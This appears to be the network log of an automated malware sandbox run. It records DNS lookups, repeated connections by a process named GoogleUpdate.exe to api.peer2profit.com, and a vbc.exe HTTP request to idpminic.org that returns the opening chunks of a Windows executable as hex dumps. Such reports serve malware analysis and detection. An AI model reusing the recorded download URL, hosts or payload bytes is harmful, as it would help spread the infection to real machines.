Nov 24, 2022 12:20:02.752621889 CET	192.168.2.3	8.8.8.8	0xd0b	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:02.781203032 CET	192.168.2.3	8.8.8.8	0x4b8c	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:12.290323973 CET	192.168.2.3	8.8.8.8	0xcd8c	Standard query (0)	filebin.net	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:41.379933119 CET	192.168.2.3	8.8.8.8	0x6463	Standard query (0)	api.peer2profit.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 24, 2022 12:19:59.398948908 CET	8.8.8.8	192.168.2.3	0x9237	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2022 12:19:59.398948908 CET	8.8.8.8	192.168.2.3	0x9237	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:19:59.432938099 CET	8.8.8.8	192.168.2.3	0x475f	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2022 12:19:59.432938099 CET	8.8.8.8	192.168.2.3	0x475f	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:02.127485991 CET	8.8.8.8	192.168.2.3	0xa2a	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2022 12:20:02.127485991 CET	8.8.8.8	192.168.2.3	0xa2a	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:02.154782057 CET	8.8.8.8	192.168.2.3	0x96c7	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2022 12:20:02.154782057 CET	8.8.8.8	192.168.2.3	0x96c7	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:02.770612955 CET	8.8.8.8	192.168.2.3	0xd0b	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2022 12:20:02.770612955 CET	8.8.8.8	192.168.2.3	0xd0b	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:02.951100111 CET	8.8.8.8	192.168.2.3	0x4b8c	No error (0)	www.idpminic.org	idpminic.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2022 12:20:02.951100111 CET	8.8.8.8	192.168.2.3	0x4b8c	No error (0)	idpminic.org		66.235.200.147	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:12.309691906 CET	8.8.8.8	192.168.2.3	0xcd8c	No error (0)	filebin.net		185.47.40.36	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:41.403631926 CET	8.8.8.8	192.168.2.3	0x6463	No error (0)	api.peer2profit.com		172.66.43.60	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:41.403631926 CET	8.8.8.8	192.168.2.3	0x6463	No error (0)	api.peer2profit.com		172.66.40.196	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

filebin.net

api.peer2profit.com

www.idpminic.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49711	185.47.40.36	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49712	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49738	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49741	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49744	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49746	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49749	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49753	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49756	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49759	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49762	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49767	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49714	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49770	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49774	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.3	49776	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.3	49780	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.3	49783	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.3	49786	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.3	49790	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.3	49794	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.3	49796	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.3	49799	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49717	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.3	49802	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.3	49805	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.3	49809	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.3	49811	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.3	49814	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.3	49819	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.3	49821	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.3	49824	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.3	49827	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.3	49829	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49720	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.3	49832	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.3	49835	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.3	49838	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.3	49840	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.3	49843	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.3	49846	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.3	49850	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.3	49853	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.3	49856	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.3	49859	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49723	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.3	49862	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.3	49865	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.3	49867	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.3	49870	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.3	49873	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.3	49876	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.3	49878	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.3	49881	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.3	49884	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.3	49887	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49726	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.3	49890	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.3	49892	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.3	49895	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.3	49897	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.3	49900	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.3	49902	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.3	49906	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.3	49909	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.3	49912	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.3	49914	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49728	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.3	49917	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.3	49920	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.3	49923	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.3	49927	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.3	49930	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.3	49934	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.3	49937	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.3	49941	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.3	49944	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.3	49948	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49731	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.3	49951	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.3	49954	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.3	49957	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.3	49959	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.3	49962	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.3	49965	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.3	49967	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.3	49972	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.3	49975	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.3	49978	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49734	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.3	49981	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.3	49708	66.235.200.147	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 12:19:59.480403900 CET	1063	OUT	GET /aula/dmi1dfg7n.kjylug HTTP/1.1 Host: www.idpminic.org Connection: Keep-Alive
Nov 24, 2022 12:19:59.576654911 CET	1064	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:19:59 GMT Transfer-Encoding: chunked Connection: keep-alive Last-Modified: Wed, 23 Nov 2022 13:28:04 GMT Vary: Accept-Encoding,User-Agent host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== CF-Cache-Status: HIT Age: 3200 Server: cloudflare CF-RAY: 76f1c0b4cdb19a0f-FRA Data Raw: 37 65 37 39 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 9e 22 43 63 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 1a 03 00 00 00 2c 00 00 10 00 00 e0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 80 2c 00 00 04 00 00 93 e1 2c 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 2c 00 14 13 00 00 00 60 2c 00 18 0d 00 00 00 90 2b 00 dc 38 00 00 00 00 00 00 00 00 00 00 00 70 2c 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 5a 2b 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 24 2c 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 78 18 03 00 00 10 00 00 00 1a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 90 fd 27 00 00 30 03 00 00 fe 27 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 50 00 00 00 30 2b 00 00 52 00 00 00 1c 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 dc 38 00 00 00 90 2b 00 00 3a 00 00 00 6e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 10 31 00 00 00 d0 2b 00 00 32 00 00 00 a8 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 a0 0f 00 00 00 10 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 14 13 00 00 00 20 2c 00 00 14 00 00 00 da 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 78 00 00 00 00 40 2c 00 00 02 00 00 00 ee 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 50 2c 00 00 02 00 00 00 f0 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 73 72 63 00 00 00 18 0d 00 00 00 60 2c 00 18 0d 00 00 00 f2 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 03 00 00 00 70 2c 00 00 04 00 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 7e79MZ@hr!L!This program cannot be run in DOS mode.$PEd"Cc.$,@,,` ,`,+8p,`Z+($,0.textx`P`.data'0'@`.rdatapP0+R+@`@.pdata8+:n+@0@.xdata1+2+@0@.bss,`.idata ,+@0.CRTx@,+@@.tlsP,+@@.rsrc`,+@0.relocp,,@0B
Nov 24, 2022 12:19:59.576685905 CET	1065	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 83 ec 28 48 8b 05 e5 Data Ascii: ff.@H(HY+1HY+HY+HY+H?X+f8MZuHcP<H8PEtiHrY++tF,HY+HX+HU+8tS1H
Nov 24, 2022 12:19:59.576704979 CET	1067	IN	Data Raw: 00 e9 5c fd ff ff 89 c1 e8 27 02 02 00 90 66 0f 1f 44 00 00 48 83 ec 28 48 8b 05 f5 54 2b 00 c7 00 01 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 d5 54 2b 00 c7 00 00 00 00 00 e8 7a fc ff ff 90 90 48 83 c4 28 c3 0f Data Ascii: \'fDH(HT+H(H(HT+zH(H('HH(H@ATH0IHtK=+u!HP+E1L+x!ALD$,LD$,7H0A\
Nov 24, 2022 12:19:59.576723099 CET	1068	IN	Data Raw: 0e 00 00 48 8d 35 44 16 03 00 b9 69 00 00 00 48 89 ef f3 48 a5 48 8d 0d 32 29 03 00 e8 3d e8 00 00 48 8d 0d 06 29 03 00 48 89 c3 e8 2e e8 00 00 80 3b 00 49 89 c4 75 5a c6 80 48 03 00 00 01 48 89 ee 45 31 c0 4c 89 e2 48 8b 84 24 c0 0e 00 00 49 8d Data Ascii: H5DiHHH2)=H)H.;IuZHHE1LH$I\|$HI$H$I$@LH)H)HHHA$Ht;I_{1DHLHHfA1DHH=uA$HL1H5H&H
Nov 24, 2022 12:19:59.576740980 CET	1069	IN	Data Raw: 4c 89 e9 e8 40 f8 01 00 85 c0 0f 85 26 07 00 00 4c 8d ac 24 90 08 00 00 66 0f 6f 05 18 12 2b 00 31 c0 b9 41 00 00 00 c7 84 24 d8 0e 00 00 1a 67 67 cf 4c 89 ef f3 48 ab 48 8d 0d 89 25 03 00 48 bf f0 3f 5b 95 f9 f1 98 6f 0f 29 84 24 c0 0e 00 00 48 Data Ascii: L@&L$fo+1A$ggLHH%H?[o)$H$HC%H>Hu0fo$@E1HHxH%@gg({t*H??osoggHogg''H1H1SH1CCILLI{T
Nov 24, 2022 12:19:59.576760054 CET	1071	IN	Data Raw: 00 48 8d 0d 1a 22 03 00 49 89 c4 e8 42 de 00 00 41 80 3c 24 00 48 89 c3 75 59 c6 80 94 04 00 00 01 48 89 ee 45 31 c0 48 89 da 48 8b 84 24 c0 0e 00 00 48 8d 7b 08 48 83 e7 f8 48 89 03 48 8b 84 24 4c 13 00 00 48 89 83 8c 04 00 00 48 89 d8 48 29 f8 Data Ascii: H"IBA<$HuYHE1HH$H{HHH$LHHH)H)HA$Ht=I-I1f.HLHHf1CHH=JuH!H!H~>IfA\|$tA~$AD
Nov 24, 2022 12:19:59.576778889 CET	1072	IN	Data Raw: 7f 00 00 48 89 f1 4c 8d 8c 24 40 01 01 00 48 8d bc 24 90 00 00 00 4c 89 4c 24 60 e8 1c 79 01 00 31 c0 b9 0d 00 00 00 45 31 c9 f3 48 ab 48 8d 44 24 70 49 89 f0 48 8d 54 24 68 48 89 44 24 50 48 8d 84 24 90 00 00 00 48 89 44 24 48 48 8b 05 09 3d 2b Data Ascii: HL$@H$LL$`y1E1HHD$pIHT$hHD$PH$HD$HH=+HT$X1$hHD$pHD$xH$HD$hHD$@HD$8D$0D$(HD$ Ld$ptH<+0uLLN#H[^_A\AUATWVS
Nov 24, 2022 12:19:59.576798916 CET	1073	IN	Data Raw: d0 02 00 48 89 44 24 30 48 89 c1 48 8b 44 24 50 48 89 44 24 40 e9 b5 fe ff ff 41 0f b7 14 24 66 89 11 e9 cc fe ff ff 48 8b 05 50 04 2b 00 41 b8 e3 39 00 00 48 8d 0d 7b ea 2a 00 c7 44 24 58 f2 c1 a0 e3 66 44 89 44 24 5c 48 89 44 24 50 e8 f3 d3 00 Data Ascii: HD$0HHD$PHD$@A$fHP+A9H{D$XfDD$\HD$PH<H;Iu6@HD$PE1LAD$9fAL$HI$A\|$t%HsSSfAt$9I1$At$AD$LqE1LLI0HH
